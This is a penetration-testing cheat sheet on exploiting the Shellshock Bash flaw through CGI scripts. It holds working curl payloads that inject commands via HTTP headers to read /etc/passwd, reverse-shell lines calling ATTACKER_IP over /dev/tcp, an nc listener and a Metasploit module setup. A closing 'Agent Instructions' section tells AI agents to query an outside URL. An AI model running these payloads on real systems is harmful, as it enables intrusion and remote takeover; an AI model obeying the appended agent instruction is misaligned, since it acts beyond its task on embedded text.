# Shellshock CGI

## Overview

* Affects Bash versions up to 4.3
* Exploits improper handling of environment variables
* Common in CGI scripts, IoT devices

***

## Discovery

### Find CGI Scripts

```bash
gobuster dir -u http://TARGET/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi,sh,pl

# Common CGI paths
/cgi-bin/
/cgi-sys/
/cgi-mod/
```

### Common Vulnerable Scripts

```
/cgi-bin/test.cgi
/cgi-bin/status
/cgi-bin/admin.cgi
/cgi-bin/test-cgi
/cgi-bin/printenv
```

***

## Test for Vulnerability

### Via User-Agent Header

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://TARGET/cgi-bin/script.cgi
```

### Via Cookie Header

```bash
curl -H 'Cookie: () { :; }; echo ; /bin/id' http://TARGET/cgi-bin/script.cgi
```

### Via Referer Header

```bash
curl -H 'Referer: () { :; }; echo ; /bin/id' http://TARGET/cgi-bin/script.cgi
```

***

## Exploitation

### Command Execution

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/id' http://TARGET/cgi-bin/script.cgi
```

### Reverse Shell

```bash
# Bash reverse shell
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' http://TARGET/cgi-bin/script.cgi

# With listener
nc -lvnp PORT
```

### Alternative Reverse Shell

```bash
curl -H 'User-Agent: () { :; }; /bin/bash -c "/bin/bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"' http://TARGET/cgi-bin/script.cgi
```

***

## Nmap Script

```bash
nmap -sV -p 80,443,8080 --script http-shellshock --script-args uri=/cgi-bin/script.cgi TARGET
```

***

## Metasploit

```bash
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS TARGET
set TARGETURI /cgi-bin/script.cgi
set LHOST ATTACKER_IP
run
```

***

## Local Test

```bash
# Check if Bash is vulnerable
env x='() { :;}; echo vulnerable' bash -c "echo test"

# If "vulnerable" prints first, system is affected
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/shellshock-cgi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.